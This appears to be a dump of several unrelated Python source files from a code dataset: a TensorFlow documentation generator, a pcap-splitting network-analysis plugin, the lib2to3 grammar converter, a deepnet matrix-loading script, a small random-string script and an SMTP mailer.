  `{"__init__.py","OWNERS","README.txt"}` are skipped.
  Files not matching `file_pattern` (using `fnmatch`) are copied with no change.
  Also, files in the `api_guides/python` directory get explicit ids set on all
  heading-2s to ensure back-links work.
  Args:
    src_dir: The directory to convert files from.
    output_dir: The root directory to write the resulting files to.
    reference_resolver: A `parser.ReferenceResolver` to make the replacements.
    file_pattern: Only replace references in files matching file_pattern,
      using fnmatch. Non-matching files are copied unchanged.
    api_docs_relpath: Relative-path string to the api_docs, from the src_dir.
  """
  # Iterate through all the source files and process them.
  for dirpath, _, filenames in os.walk(src_dir):
    # Relative path climbing from dirpath back up to src_dir.
    depth = os.path.relpath(src_dir, start=dirpath)
    # How to get from `dirpath` to api_docs/python/
    relative_path_to_root = os.path.join(depth, api_docs_relpath, 'python')
    # Make the directory under output_dir.
    new_dir = os.path.join(output_dir,
                           os.path.relpath(path=dirpath, start=src_dir))
    if not os.path.exists(new_dir):
      os.makedirs(new_dir)
    for base_name in filenames:
      if base_name in EXCLUDED:
        continue
      full_in_path = os.path.join(dirpath, base_name)
      # Set the `current_doc_full_name` so bad files can be reported on errors.
      reference_resolver.current_doc_full_name = full_in_path
      suffix = os.path.relpath(path=full_in_path, start=src_dir)
      full_out_path = os.path.join(output_dir, suffix)
      # Copy files that do not match the file_pattern, unmodified.
      if not fnmatch.fnmatch(base_name, file_pattern):
        if full_in_path != full_out_path:
          shutil.copyfile(full_in_path, full_out_path)
        continue
      # Read/write as bytes and decode explicitly so the rewrite is
      # UTF-8-safe on both PY2 and PY3.
      with open(full_in_path, 'rb') as f:
        content = f.read().decode('utf-8')
      content = reference_resolver.replace_references(content,
                                                      relative_path_to_root)
      with open(full_out_path, 'wb') as f:
        f.write(content.encode('utf-8'))
class DocGenerator(object):
  """Main entry point for generating docs."""
  def __init__(self):
    self.argument_parser = argparse.ArgumentParser()
    self._py_modules = None
    self._private_map = _get_default_private_map()
    self._do_not_descend_map = _get_default_do_not_descend_map()
    self.yaml_toc = True
    self.argument_parser.add_argument(
        '--no_search_hints',
        dest='search_hints',
        action='store_false',
        default=True)
    self.argument_parser.add_argument(
        '--site_api_path',
        type=str, default='',
        # Fixed: the two adjacent string literals previously concatenated to
        # "api_docsdirectory" (missing separating space).
        help='The path from the site-root to api_docs '
        'directory for this project')
    self.argument_parser.add_argument(
        '--api_cache_out_path',
        type=str,
        default=None,
        help='Path to store a json-serialized api-index, so links can be '
        'inserted into docs without rebuilding the api_docs')
  def add_output_dir_argument(self):
    """Register the required --output_dir flag."""
    self.argument_parser.add_argument(
        '--output_dir',
        type=str,
        default=None,
        required=True,
        help='Directory to write docs to.')
  def add_src_dir_argument(self):
    """Register the optional --src_dir flag.

    NOTE(review): the default is evaluated here, so calling this method
    creates a temp directory even when --src_dir is supplied.
    """
    self.argument_parser.add_argument(
        '--src_dir',
        type=str,
        default=tempfile.mkdtemp(),
        required=False,
        help='Optional directory of source docs to add api_docs links to')
  def add_base_dir_argument(self, default_base_dir):
    """Register the --base_dir flag with the given default."""
    self.argument_parser.add_argument(
        '--base_dir',
        type=str,
        default=default_base_dir,
        help='Base directory to strip from file names referenced in docs.')
  def parse_known_args(self):
    """Parse known CLI flags, ignoring unrecognized ones."""
    flags, _ = self.argument_parser.parse_known_args()
    return flags
  def add_to_private_map(self, d):
    add_dict_to_dict(d, self._private_map)
  def add_to_do_not_descend_map(self, d):
    add_dict_to_dict(d, self._do_not_descend_map)
  def set_private_map(self, d):
    self._private_map = d
  def set_do_not_descend_map(self, d):
    self._do_not_descend_map = d
  def set_py_modules(self, py_modules):
    self._py_modules = py_modules
  def py_module_names(self):
    """Return the names of the registered modules; requires set_py_modules."""
    if self._py_modules is None:
      raise RuntimeError(
          'Must call set_py_modules() before running py_module_names().')
    return [name for (name, _) in self._py_modules]
  def make_reference_resolver(self, visitor, doc_index):
    return parser.ReferenceResolver.from_visitor(
        visitor, doc_index, py_module_names=self.py_module_names())
  def make_parser_config(self, visitor, reference_resolver, guide_index,
                         base_dir):
    return parser.ParserConfig(
        reference_resolver=reference_resolver,
        duplicates=visitor.duplicates,
        duplicate_of=visitor.duplicate_of,
        tree=visitor.tree,
        index=visitor.index,
        reverse_index=visitor.reverse_index,
        guide_index=guide_index,
        base_dir=base_dir)
  def run_extraction(self):
    """Crawl the registered modules and return the populated visitor."""
    return extract(self._py_modules, self._private_map,
                   self._do_not_descend_map)
  def build(self, flags):
    """Build all the docs.
    This produces two outputs
    python api docs:
      * generated from modules set with `set_py_modules`.
      * written to '{FLAGS.output_dir}/api_docs/python/'
    non-api docs:
      * Everything in '{FLAGS.src_dir}' is copied to '{FLAGS.output_dir}'.
      * '@{}' references in '.md' files are replaced with links.
      * '.md' files under 'api_guides/python' have explicit ids set for their
        second level headings.
    Args:
      flags:
        * src_dir: Where to fetch the non-api-docs.
        * base_dir: Base of the docs directory (Used to build correct
          relative links).
        * output_dir: Where to write the resulting docs.
    Returns:
      The number of errors encountered while processing.
    """
    # Extract the python api from the _py_modules
    doc_index = build_doc_index(flags.src_dir)
    visitor = self.run_extraction()
    reference_resolver = self.make_reference_resolver(visitor, doc_index)
    if getattr(flags, 'api_cache_out_path', None):
      reference_resolver.to_json_file(flags.api_cache_out_path)
    # Build the guide_index for the api_docs back links.
    root_title = getattr(flags, 'root_title', 'TensorFlow')
    guide_index = _build_guide_index(
        os.path.join(flags.src_dir, 'api_guides/python'))
    # Write the api docs.
    parser_config = self.make_parser_config(visitor, reference_resolver,
                                            guide_index, flags.base_dir)
    output_dir = os.path.join(flags.output_dir, 'api_docs/python')
    write_docs(
        output_dir,
        parser_config,
        yaml_toc=self.yaml_toc,
        root_title=root_title,
        search_hints=getattr(flags, 'search_hints', True),
        site_api_path=getattr(flags, 'site_api_path', ''))
    # Replace all the @{} references in files under `FLAGS.src_dir`
    replace_refs(flags.src_dir, flags.output_dir, reference_resolver, '*.md')
    # Fix the tags in the guide dir.
    guide_dir = os.path.join(flags.output_dir, 'api_guides/python')
    if os.path.exists(guide_dir):
      update_id_tags_inplace(guide_dir)
    # Report all errors found by the reference resolver, and return the error
    # code.
    parser_config.reference_resolver.log_errors()
    return parser_config.reference_resolver.num_errors()
|
silvahaberl/Jezici-gramatike-automati- | refs/heads/master | proba.py | 1 | import random
import string
from random import randint
# Build the alphabet Σ = {'0', '1'} as a set of one-character strings.
Σ=set()
Σ.add('0')
Σ.add('1')
print("lista(Σ)",list(Σ))
# NOTE(review): the name means "word length" in Croatian, but this value is
# actually the alphabet's size (2) — confirm intent.
duljinaRiječi = len(list(Σ))
def random_string(length):
    # Return a random word of `length` symbols drawn uniformly from Σ.
    return ''.join(random.choice(list(Σ)) for i in range(length))
# Emit one random word whose length is between 1 and len(Σ), inclusive.
print(random_string(randint(1,duljinaRiječi)))
print("duljinaRiječi:", duljinaRiječi)
#print("ulaz:", ulaz)
|
CyberReboot/vent-plugins | refs/heads/master | pcap_to_node_pcap/pcap_to_node_pcap.py | 1 | """
Plugin that takes pcap files and splits them by server and client
ip addresses
Created on 17 July 2017
@author: Blake Pagon
"""
# TODO: https://github.com/PyCQA/bandit/issues/333 for bandit false positive on subprocess.
import argparse
import datetime
import ipaddress
import json
import os
import re
import shlex
import shutil
import subprocess
import tempfile
import pika
def parse_layer_ports(json_fields):
    """Collect the integer values of every field whose name ends in 'port'.

    Args:
        json_fields: mapping of tshark field name -> field content string.

    Returns:
        Set of ints parsed from '*port' fields; non-numeric contents are
        silently skipped.
    """
    found = set()
    for name, value in json_fields.items():
        if not name.endswith('port'):
            continue
        try:
            found.add(int(value))
        except ValueError:
            pass
    return found
def ipaddress_fields(json_fields):
    """Return the set of IP addresses found among the field values.

    Each value that parses as an IPv4/IPv6 address is normalized by
    collapsing every run of non-digit characters to '-' (a
    filename-safe form); unparseable values are ignored.
    """
    addresses = set()
    for _, value in sorted(json_fields.items()):
        try:
            parsed = ipaddress.ip_address(value)
        except ValueError:
            continue
        addresses.add(re.sub(r'[^0-9]+', '-', str(parsed)))
    return addresses
def pcap_name_with_layers(pcap_filename, pcap_layers, pcap_suffix):
    """Insert a '-'-joined, sanitized layer list into a pcap file name.

    Example: ('/d/x.pcap', ['ip', 'tcp'], '.pcap') -> '/d/x-ip-tcp.pcap'.

    Bug fix: the previous implementation used str.replace() over the whole
    path, which also rewrote directory components that happened to contain
    the base name (e.g. '/foo/foo.pcap' became '/foo-ip/foo-ip.pcap').
    Only the file's base name is rewritten now.

    Args:
        pcap_filename: full path of the pcap file.
        pcap_layers: iterable of layer names; characters outside
            [a-zA-Z0-9-] are stripped from each.
        pcap_suffix: file suffix (e.g. '.pcap') to preserve at the end.

    Returns:
        The path with the layer list spliced in before the suffix.
    """
    dir_name, base_name = os.path.split(pcap_filename)
    stem = base_name
    if stem.endswith(pcap_suffix):
        stem = stem[:-len(pcap_suffix)]
    safe_pcap_layers = [
        re.sub(r'[^a-zA-Z0-9\-]+', '', layer) for layer in pcap_layers]
    # Keep the original 'stem-' shape even when the layer list is empty.
    new_base = stem + '-' + '-'.join(safe_pcap_layers) + pcap_suffix
    return os.path.join(dir_name, new_base)
def parse_pcap_json_to_layers(pcap_json):
    """Pick the richest per-packet layer description in a tshark JSON dump.

    For every packet, builds a candidate list of normalized IP addresses,
    the packet's layer names, and the lowest port observed; returns the
    longest such list seen (empty list when nothing parses).
    """
    best = []
    for packet in pcap_json:
        try:
            layers = packet['_source']['layers']
        except KeyError:
            continue
        addresses = set()
        port_set = set()
        for proto in ('ip', 'ipv6', 'arp', 'tcp', 'udp'):
            if proto not in layers:
                continue
            fields = layers[proto]
            addresses = addresses.union(ipaddress_fields(fields))
            port_set = port_set.union(parse_layer_ports(fields))
        candidate = sorted(addresses) + list(layers.keys())
        if port_set:
            candidate.append('port-%u' % min(port_set))
        if len(candidate) > len(best):
            best = candidate
    return best
def proto_annotate_pcaps(pcap_dir):
    """Rename every .pcap in *pcap_dir* to embed its protocol layers.

    Each file's first packets are decoded to JSON with tshark, the richest
    layer description is extracted with parse_pcap_json_to_layers(), and
    the file is renamed in place via pcap_name_with_layers().  Files that
    tshark cannot read are skipped with a message.  A missing directory is
    reported and ignored.
    """
    pcap_suffix = '.pcap'
    try:
        pap_filenames = [
            pcap.path for pcap in os.scandir(pcap_dir)
            if pcap.is_file() and pcap.path.endswith(pcap_suffix)]
    except FileNotFoundError as err:
        print(err)
        return
    for pcap_filename in pap_filenames:
        try:
            # Only the first 10 packets are sampled (-c 10) to keep this fast.
            response = subprocess.check_output(shlex.split(' '.join( # nosec
                ['./tshark', '-T', 'json', '-c', str(10), '-r', pcap_filename])))
            pcap_json = json.loads(response.decode('utf-8'))
        except (json.decoder.JSONDecodeError, subprocess.CalledProcessError) as e:
            print(pcap_filename, str(e))
            continue
        pcap_layers = parse_pcap_json_to_layers(pcap_json)
        layers_pcap_filename = pcap_name_with_layers(pcap_filename, pcap_layers, pcap_suffix)
        os.rename(pcap_filename, layers_pcap_filename)
def connect_rabbit(host='messenger', port=5672, queue='task_queue'):
    """Open a blocking RabbitMQ connection and declare a durable queue.

    Returns the channel with *queue* already declared.
    """
    connection = pika.BlockingConnection(
        pika.ConnectionParameters(host=host, port=port))
    channel = connection.channel()
    channel.queue_declare(queue=queue, durable=True)
    return channel
def send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):
    """Publish *msg* as persistent JSON on *channel* and log the delivery."""
    persistent = pika.BasicProperties(delivery_mode=2,)
    channel.basic_publish(exchange=exchange,
                          routing_key=routing_key,
                          body=json.dumps(msg),
                          properties=persistent)
    # Log the id/file_path of what was just published, UTC-stamped.
    print(" [X] %s UTC %r %r" % (str(datetime.datetime.utcnow()),
                                 str(msg['id']), str(msg['file_path'])))
def get_version():
    """Return the stripped final line of the local VERSION file ('' if empty)."""
    version = ''
    with open('VERSION', 'r') as fh:
        lines = fh.readlines()
    if lines:
        # The original loop kept overwriting, so only the last line matters.
        version = lines[-1].strip()
    return version
def get_path(paths):
    """Return the first entry of *paths*, or None if there is none.

    Args:
        paths: list of command-line path arguments (possibly empty or None).

    Returns:
        paths[0], or None (after printing a message) when the list is
        empty or not indexable.  The previous blanket `except Exception`
        is narrowed to the two errors an absent argument actually raises.
    """
    try:
        return paths[0]
    except (IndexError, TypeError) as e:
        print("No path provided: {0}, quitting".format(str(e)))
        return None
def run_split(in_path, clients_dir, servers_dir):
    """Split *in_path* into per-client and per-server pcaps via PcapSplitter.

    Failures of either invocation are printed and do not abort the other.
    """
    commands = (
        " ".join(("./PcapSplitter -f", in_path, "-o", clients_dir, "-m client-ip")),
        " ".join(("./PcapSplitter -f", in_path, "-o", servers_dir, "-m server-ip")),
    )
    for command in commands:
        try:
            subprocess.check_call(shlex.split(command))  # nosec
        except Exception as err:
            print("%s: %s" % (command, err))
def run_tool(path, protoannotate):
    """Split one pcap into per-client/per-server pcaps under a new directory.

    Args:
        path: pcap file to split; files under 100 bytes are skipped.
        protoannotate: when True, split into temp dirs first and rename the
            pieces with their protocol layers before exposing them.

    Returns:
        The clients output directory path, or None for a too-small input.
        NOTE(review): clients_dir is returned even when the try block
        failed partway — confirm callers tolerate a missing/empty dir.
    """
    if os.path.getsize(path) < 100:
        print("pcap file too small, not splitting")
        return None
    # need to make directories to store results from pcapsplitter
    base_dir = path.rsplit('/', 1)[0]
    # NOTE(review): datetime.now() is local time, yet the suffix claims
    # UTC — confirm whether utcnow() was intended.
    timestamp = '-'.join(str(datetime.datetime.now()).split(' ')) + '-UTC'
    timestamp = timestamp.replace(':', '_')
    output_dir = os.path.join(base_dir, 'pcap-node-splitter' + '-' + timestamp)
    clients_dir = os.path.join(output_dir, 'clients')
    servers_dir = os.path.join(output_dir, 'servers')
    try:
        os.mkdir(output_dir)
        # Ensure file_drop doesn't see pcap before annotation..
        if protoannotate:
            tmp_clients_dir = tempfile.mkdtemp()
            tmp_servers_dir = tempfile.mkdtemp()
            run_split(path, tmp_clients_dir, tmp_servers_dir)
            for tmp_dir, final_dir in (
                    (tmp_clients_dir, clients_dir),
                    (tmp_servers_dir, servers_dir)):
                proto_annotate_pcaps(tmp_dir)
                shutil.copytree(tmp_dir, final_dir)
                shutil.rmtree(tmp_dir)
        else:
            for new_dir in (clients_dir, servers_dir):
                os.mkdir(new_dir)
            run_split(path, clients_dir, servers_dir)
    except Exception as err:
        print(err)
    return clients_dir
def parse_args(parser):
    """Register this tool's command-line options on *parser* and parse sys.argv.

    Returns:
        argparse.Namespace with `protoannotate` (bool) and `paths` (list).
    """
    parser.add_argument(
        '--protoannotate',
        help='use tshark to annotate pcaps with protocol',
        action='store_true',
        # NOTE(review): store_true combined with default=True means the
        # option is always True and can never be disabled — confirm intent.
        default=True)
    parser.add_argument('paths', nargs='*')
    parsed_args = parser.parse_args()
    return parsed_args
if __name__ == '__main__': # pragma: no cover
    parsed_args = parse_args(argparse.ArgumentParser())
    path = get_path(parsed_args.paths)
    if path:
        result_path = run_tool(path, parsed_args.protoannotate)
    # Correlation id handed to this container by the pipeline, if any.
    uid = ''
    if 'id' in os.environ:
        uid = os.environ['id']
    # Publish a metadata message only when rabbit integration is enabled.
    # NOTE(review): if `path` was falsy, result_path is unbound here and
    # this block would raise NameError — confirm the env never enables
    # rabbit without a path argument.
    if os.environ.get('rabbit', False) == 'true':
        try:
            channel = connect_rabbit()
            body = {'id': uid, 'type': 'metadata', 'file_path': result_path, 'data': '',
                    'results': {'tool': 'pcap-splitter', 'version': get_version()}}
            send_rabbit_msg(body, channel)
        except Exception as e:
            print(str(e))
|
Big-B702/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/lib2to3/pgen2/conv.py | 68 | # Copyright 2004-2005 Elemental Security, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Convert graminit.[ch] spit out by pgen to Python code.
Pgen is the Python parser generator. It is useful to quickly create a
parser from a grammar file in Python's grammar notation. But I don't
want my parsers to be written in C (yet), so I'm translating the
parsing tables to Python data structures and writing a Python parse
engine.
Note that the token numbers are constants determined by the standard
Python tokenizer. The standard token module defines these numbers and
their names (the names are not used much). The token numbers are
hardcoded into the Python tokenizer and into pgen. A Python
implementation of the Python tokenizer is also available, in the
standard tokenize module.
On the other hand, symbol numbers (representing the grammar's
non-terminals) are assigned by pgen based on the actual grammar
input.
Note: this module is pretty much obsolete; the pgen module generates
equivalent grammar tables directly from the Grammar.txt input file
without having to invoke the Python pgen C program.
"""
# Python imports
import re
# Local imports
from pgen2 import grammar, token
class Converter(grammar.Grammar):
    """Grammar subclass that reads classic pgen output files.

    The run() method reads the tables as produced by the pgen parser
    generator, typically contained in two C files, graminit.h and
    graminit.c.  The other methods are for internal use only.

    See the base class for more documentation.
    """

    def run(self, graminit_h, graminit_c):
        """Load the grammar tables from the text files written by pgen."""
        self.parse_graminit_h(graminit_h)
        self.parse_graminit_c(graminit_c)
        self.finish_off()

    def parse_graminit_h(self, filename):
        """Parse the .h file written by pgen.  (Internal)

        This file is a sequence of #define statements defining the
        nonterminals of the grammar as numbers.  We build two tables
        mapping the numbers to names and back.

        Returns True on success, False if the file could not be opened.
        """
        try:
            f = open(filename)
        except IOError as err:
            print("Can't open %s: %s" % (filename, err))
            return False
        self.symbol2number = {}
        self.number2symbol = {}
        lineno = 0
        with f:  # close the file even if an assert fires below
            for line in f:
                lineno += 1
                mo = re.match(r"^#define\s+(\w+)\s+(\d+)$", line)
                if mo:
                    symbol, number = mo.groups()
                    number = int(number)
                    assert symbol not in self.symbol2number
                    assert number not in self.number2symbol
                    self.symbol2number[symbol] = number
                    self.number2symbol[number] = symbol
                elif line.strip():
                    # Bug fix: the original `if not mo and line.strip(): ...
                    # else: mo.groups()` shape sent blank lines (mo is None,
                    # strip() falsy) into the else branch and crashed on
                    # mo.groups().  Blank lines are now skipped silently.
                    print("%s(%s): can't parse %s" % (filename, lineno,
                                                      line.strip()))
        return True

    def parse_graminit_c(self, filename):
        """Parse the .c file written by pgen.  (Internal)

        The file looks as follows.  The first two lines are always this:

        #include "pgenheaders.h"
        #include "grammar.h"

        After that come four blocks:

        1) one or more state definitions
        2) a table defining dfas
        3) a table defining labels
        4) a struct defining the grammar

        A state definition has the following form:
        - one or more arc arrays, each of the form:
          static arc arcs_<n>_<m>[<k>] = {
            {<i>, <j>},
            ...
          };
        - followed by a state array, of the form:
          static state states_<s>[<t>] = {
            {<k>, arcs_<n>_<m>},
            ...
          };
        """
        try:
            f = open(filename)
        except IOError as err:
            print("Can't open %s: %s" % (filename, err))
            return False
        # The code below essentially uses f's iterator-ness!
        lineno = 0

        # Expect the two #include lines.
        lineno, line = lineno+1, next(f)
        assert line == '#include "pgenheaders.h"\n', (lineno, line)
        lineno, line = lineno+1, next(f)
        assert line == '#include "grammar.h"\n', (lineno, line)

        # Parse the state definitions: groups of arc arrays, each group
        # followed by one state array that references them.
        lineno, line = lineno+1, next(f)
        allarcs = {}
        states = []
        while line.startswith("static arc "):
            while line.startswith("static arc "):
                mo = re.match(r"static arc arcs_(\d+)_(\d+)\[(\d+)\] = {$",
                              line)
                assert mo, (lineno, line)
                n, m, k = list(map(int, mo.groups()))
                arcs = []
                for _ in range(k):
                    lineno, line = lineno+1, next(f)
                    mo = re.match(r"\s+{(\d+), (\d+)},$", line)
                    assert mo, (lineno, line)
                    i, j = list(map(int, mo.groups()))
                    arcs.append((i, j))
                lineno, line = lineno+1, next(f)
                assert line == "};\n", (lineno, line)
                allarcs[(n, m)] = arcs
                lineno, line = lineno+1, next(f)
            mo = re.match(r"static state states_(\d+)\[(\d+)\] = {$", line)
            assert mo, (lineno, line)
            s, t = list(map(int, mo.groups()))
            assert s == len(states), (lineno, line)
            state = []
            for _ in range(t):
                lineno, line = lineno+1, next(f)
                mo = re.match(r"\s+{(\d+), arcs_(\d+)_(\d+)},$", line)
                assert mo, (lineno, line)
                k, n, m = list(map(int, mo.groups()))
                arcs = allarcs[n, m]
                assert k == len(arcs), (lineno, line)
                state.append(arcs)
            states.append(state)
            lineno, line = lineno+1, next(f)
            assert line == "};\n", (lineno, line)
            lineno, line = lineno+1, next(f)
        self.states = states

        # Parse the dfas table; each entry references a state array above
        # and carries the nonterminal's first-set as an escaped bitset.
        dfas = {}
        mo = re.match(r"static dfa dfas\[(\d+)\] = {$", line)
        assert mo, (lineno, line)
        ndfas = int(mo.group(1))
        for _ in range(ndfas):
            lineno, line = lineno+1, next(f)
            mo = re.match(r'\s+{(\d+), "(\w+)", (\d+), (\d+), states_(\d+),$',
                          line)
            assert mo, (lineno, line)
            symbol = mo.group(2)
            number, x, y, z = list(map(int, mo.group(1, 3, 4, 5)))
            assert self.symbol2number[symbol] == number, (lineno, line)
            assert self.number2symbol[number] == symbol, (lineno, line)
            assert x == 0, (lineno, line)
            state = states[z]
            assert y == len(state), (lineno, line)
            lineno, line = lineno+1, next(f)
            mo = re.match(r'\s+("(?:\\\d\d\d)*")},$', line)
            assert mo, (lineno, line)
            first = {}
            # eval() is acceptable only because the input is pgen-generated;
            # it decodes the C string literal of octal escapes.
            rawbitset = eval(mo.group(1))
            # Renamed from `i`/`j` to avoid shadowing the outer dfa index.
            for byte_index, c in enumerate(rawbitset):
                byte = ord(c)
                for bit in range(8):
                    if byte & (1 << bit):
                        first[byte_index*8 + bit] = 1
            dfas[number] = (state, first)
        lineno, line = lineno+1, next(f)
        assert line == "};\n", (lineno, line)
        self.dfas = dfas

        # Parse the labels table: (token-number, string-or-None) pairs.
        labels = []
        lineno, line = lineno+1, next(f)
        mo = re.match(r"static label labels\[(\d+)\] = {$", line)
        assert mo, (lineno, line)
        nlabels = int(mo.group(1))
        for _ in range(nlabels):
            lineno, line = lineno+1, next(f)
            mo = re.match(r'\s+{(\d+), (0|"\w+")},$', line)
            assert mo, (lineno, line)
            x, y = mo.groups()
            x = int(x)
            if y == "0":
                y = None
            else:
                y = eval(y)  # pgen-generated C string literal -> str
            labels.append((x, y))
        lineno, line = lineno+1, next(f)
        assert line == "};\n", (lineno, line)
        self.labels = labels

        # Parse the grammar struct, verifying it against the tables above.
        lineno, line = lineno+1, next(f)
        assert line == "grammar _PyParser_Grammar = {\n", (lineno, line)
        lineno, line = lineno+1, next(f)
        mo = re.match(r"\s+(\d+),$", line)
        assert mo, (lineno, line)
        ndfas = int(mo.group(1))
        assert ndfas == len(self.dfas)
        lineno, line = lineno+1, next(f)
        assert line == "\tdfas,\n", (lineno, line)
        lineno, line = lineno+1, next(f)
        mo = re.match(r"\s+{(\d+), labels},$", line)
        assert mo, (lineno, line)
        nlabels = int(mo.group(1))
        assert nlabels == len(self.labels), (lineno, line)
        lineno, line = lineno+1, next(f)
        mo = re.match(r"\s+(\d+)$", line)
        assert mo, (lineno, line)
        start = int(mo.group(1))
        assert start in self.number2symbol, (lineno, line)
        self.start = start
        lineno, line = lineno+1, next(f)
        assert line == "};\n", (lineno, line)
        # The struct must be the last thing in the file.
        try:
            lineno, line = lineno+1, next(f)
        except StopIteration:
            pass
        else:
            assert 0, (lineno, line)
        f.close()  # previously leaked on the success path

    def finish_off(self):
        """Create additional useful structures.  (Internal)."""
        self.keywords = {}  # map from keyword strings to arc labels
        self.tokens = {}    # map from numeric token values to arc labels
        for ilabel, (type, value) in enumerate(self.labels):
            if type == token.NAME and value is not None:
                # A NAME-typed label with a value is a keyword.
                self.keywords[value] = ilabel
            elif value is None:
                # A label with no value stands for a plain token type.
                self.tokens[type] = ilabel
|
smoitra87/gerbil | refs/heads/master | deepnet/load_mat_to_model.py | 1 | """Write a model protocol buffer to mat file."""
from deepnet import util
import numpy as np
import sys
import scipy.io
import scipy.io as sio
import gzip
import os
def Convert(args, dirpath, mat_file, dump_npy = False, out_file = 'rbm_mrf', model_file=None):
    """Load an MRF edge-weight matrix from *mat_file* and export it.

    Depending on the flags in *args*, the weight matrix is taken from the
    min-fill factorization ('minL' dotted with 'Pmat'), randomly
    re-sparsified, magnitude-thresholded, or used as-is ('L').  A constant
    diagonal is built from 'min_eig' and 'alpha'.  Results are written
    either as .npy files or spliced into a deepnet model protobuf.

    Args:
        args: parsed namespace with minfill/random/thresh/edge_input_file.
        dirpath: directory to write outputs into.
        mat_file: path of the input .mat file.
        dump_npy: if True write edge/diag .npy files; else update a protobuf.
        out_file: name of the gzipped output model (protobuf mode only).
        model_file: template model protobuf to modify (protobuf mode only).
    """
    matfile = sio.loadmat(mat_file)
    if args.minfill:
        # get the weight matrix
        weight = np.asarray(matfile['minL'], dtype='float32')
        Pmat = matfile['Pmat']
        weight = weight.dot(Pmat)
        weight = weight.T
    elif args.random:
        # Keep the same number of non-zeros as 'L', but place random
        # normal weights at uniformly random positions instead.
        weight = np.asarray(matfile['L'].T, dtype='float32')
        weight[np.abs(weight)<1e-8] = 0.0
        nnz = np.count_nonzero(weight)
        nNodes = weight.shape[0]
        weight = np.random.randn(nNodes**2, 1)
        rangeIdx = np.arange(nNodes**2)
        np.random.shuffle(rangeIdx)
        weight[rangeIdx[nnz:]] = 0.
        weight = weight.reshape(nNodes, nNodes)
        print("nnz: {}".format(nnz))
    elif args.thresh:
        # Zero out the smallest-magnitude entries of 'L', removing
        # args.thresh percent of the sparsity gap between L and minL.
        # NOTE(review): the message says "0 and 1" but the accepted
        # range here is 0..100 — confirm which is intended.
        if not -0.00001 < args.thresh < 100.000001:
            raise ValueError("Threshold should be b/w 0 and 1")
        weight = np.asarray(matfile['L'].T, dtype='float32')
        weight_minfill = np.asarray(matfile['minL'], dtype='float32')
        nnz = np.sum(np.abs(weight) > 1e-10)
        nnz_minfill = np.sum(np.abs(weight_minfill) > 1e-10)
        num_to_delete = int((nnz - nnz_minfill) * args.thresh / 100.)
        weight_nnz = np.abs(weight[np.abs(weight)>1e-10])
        threshold = np.sort(weight_nnz)[num_to_delete]
        weight[np.abs(weight) < threshold] = 0.0
    else:
        weight = np.asarray(matfile['L'].T, dtype='float32')
    nFeats,_ = weight.shape
    # Constant diagonal: min_eig scaled by (1 + alpha), one entry per feature.
    diag = np.ones([nFeats, 1]) * matfile['min_eig'] * (1+matfile['alpha'])
    diag = np.asarray(diag, dtype='float32')
    if dump_npy :
        if args.edge_input_file:
            edge_file = os.path.join(dirpath, args.edge_input_file)
        else:
            edge_file = os.path.join(dirpath, 'edge_input_to_gaussian.npy')
        diag_file = os.path.join(dirpath, 'diag_gaussian.npy')
        np.save(edge_file, weight)
        np.save(diag_file, diag)
    else:
        # Splice weight/diag into the template protobuf and gzip it out.
        model = util.ReadModel(model_file)
        proto_weight = next(param for param in model.edge[0].param if param.name == 'weight')
        proto_weight.mat = util.NumpyAsParameter(weight)
        proto_weight.dimensions.extend(weight.shape)
        input_layer = next(l for l in model.layer if l.name == 'input_layer')
        proto_diag = next(param for param in input_layer.param if param.name == 'diag')
        proto_diag.mat = util.NumpyAsParameter(diag)
        proto_diag.dimensions.extend(diag.shape)
        out_file = os.path.join(dirpath, out_file)
        f = gzip.open(out_file, 'wb')
        f.write(model.SerializeToString())
        f.close()
if __name__ == '__main__':
    from argparse import ArgumentParser
    parser = ArgumentParser()
    parser.add_argument("--model_file", type=str)       # template model protobuf
    parser.add_argument("--mat_file", type=str)         # input .mat file
    parser.add_argument("--out_file", type=str)         # output model name
    parser.add_argument("--edge_input_file", type=str)  # custom edge .npy name
    parser.add_argument("--dirpath", type=str)          # output directory
    parser.add_argument("--npy", action='store_true')      # dump .npy instead of protobuf
    parser.add_argument("--minfill", action='store_true')  # use min-fill weights
    parser.add_argument("--random", action='store_true')   # randomize weight positions
    parser.add_argument("--thresh", type=float, help="Threshold L")
    args = parser.parse_args()
    # Dispatch on output format; Convert interprets the remaining flags.
    if args.npy:
        Convert(args, args.dirpath, args.mat_file, dump_npy = True)
    else:
        Convert(args, args.dirpath, args.mat_file, dump_npy = False, out_file = args.out_file, model_file=args.model_file)
|
jaredestroud/AutoMailer | refs/heads/master | AutoMailer.py | 1 | #!/usr/bin/env python
'''
Author: Jared Stroud
Date: January 2016
Purpose: Automate mailing users after events occur.
'''
import random
import smtplib
class emailReqs():
    """Holds addressing/SMTP settings and sends mail over SMTP with STARTTLS."""

    def __init__(self, fromaddress, to, smtpProvider="smtp.gmail.com:587"):
        """Store sender, recipient and the 'host:port' SMTP endpoint."""
        self.fromaddr = fromaddress
        self.toaddr = to
        self.smtp = smtpProvider # Defaulting to Google.

    def messageBody(self, msg, emailSubject):
        '''
        Name: messageBody
        Parameters: msg(string), contents of message to send.
                    emailSubject(string), The email subject.
        Return: (String) which contains subject and message body of email.
        '''
        message = 'Subject: %s\n\n%s' % (emailSubject, msg)
        return message

    def emailLogin(self, username, password, message):
        '''
        Name: emailLogin
        Parameters:
            username(string): e-mail provider username.
            password(string): e-mail provider's password.
            message(string): Return value of messageBody.
        '''
        # Bug fix: previously this hardcoded 'smtp.gmail.com:587' and
        # silently ignored the smtpProvider constructor argument.
        server = smtplib.SMTP(self.smtp)
        server.starttls()
        server.login(username, password)
        print ("From: %s \n To: %s\n Message: %s\n" % (self.fromaddr,
                                                       self.toaddr,
                                                       message))
        server.sendmail(self.fromaddr, self.toaddr, message)
        server.quit()
if __name__ == "__main__":
    # Fill in real credentials/addresses before running; all blank by default.
    userName = ""
    emailFrom = ""
    emailTo = ""
    password = ""
    subject = ""
    message = "Test_Message"
    # Build the mailer, render the message, then log in and send it.
    mailObj = emailReqs(emailFrom, emailTo)
    msg = mailObj.messageBody(message, subject)
    mailObj.emailLogin(userName, password, msg)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.